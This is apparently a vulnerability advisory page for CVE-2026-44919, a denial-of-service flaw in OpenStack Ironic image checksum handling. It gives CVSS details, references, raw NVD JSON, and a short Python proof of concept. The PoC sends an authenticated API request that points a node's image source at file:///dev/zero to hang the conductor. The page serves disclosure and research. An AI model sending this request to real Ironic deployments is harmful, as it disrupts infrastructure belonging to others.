CVE-2026-44919

Description

In OpenStack Ironic through 35.x before a3f6d73, during image handling, an infinite loop in checksum calculations can occur via the file:///dev/zero URL.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

OpenStack Ironic <= 35.x (commit a3f6d73 之前)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Conceptual Proof of Concept for CVE-2026-44919
# This demonstrates how a malicious image URL could trigger the infinite loop.

import requests

# Target Ironic API endpoint
ironic_api_url = "http://target-ironic-api:6385/v1/nodes"
node_id = "<TARGET_NODE_UUID>"
auth_token = "<VALID_AUTH_TOKEN>"

# Malicious configuration pointing to /dev/zero
# This causes the checksum calculation to loop infinitely.
payload = {
    "instance_info": {
        "image_source": "file:///dev/zero",
        "image_checksum": "http://example.com/fake_checksum"
    }
}

headers = {
    "Content-Type": "application/json",
    "X-Auth-Token": auth_token
}

try:
    # Send request to update node with malicious image URL
    response = requests.patch(
        f"{ironic_api_url}/{node_id}",
        json=payload,
        headers=headers
    )
    print(f"Request sent with status code: {response.status_code}")
    print("If successful, the Ironic conductor will enter an infinite loop during checksum validation.")
except Exception as e:
    print(f"Error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-44919
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-44919
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-44919/
[4] VulDB https://vuldb.com/cve/CVE-2026-44919
[5] https://bugs.launchpad.net/ironic/+bug/2150332
[6] https://opendev.org/openstack/ironic/commit/a3f6d735ac3642ab95b49142c7305f072ae748d0
[7] https://bugs.launchpad.net/ironic/+bug/2150332

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-44919", "sourceIdentifier": "[email protected]", "published": "2026-05-14T02:17:21.773", "lastModified": "2026-05-14T18:30:57.103", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "In OpenStack Ironic through 35.x before a3f6d73, during image handling, an infinite loop in checksum calculations can occur via the file:///dev/zero URL."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-696"}]}], "references": [{"url": "https://bugs.launchpad.net/ironic/+bug/2150332", "source": "[email protected]"}, {"url": "https://opendev.org/openstack/ironic/commit/a3f6d735ac3642ab95b49142c7305f072ae748d0", "source": "[email protected]"}, {"url": "https://bugs.launchpad.net/ironic/+bug/2150332", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}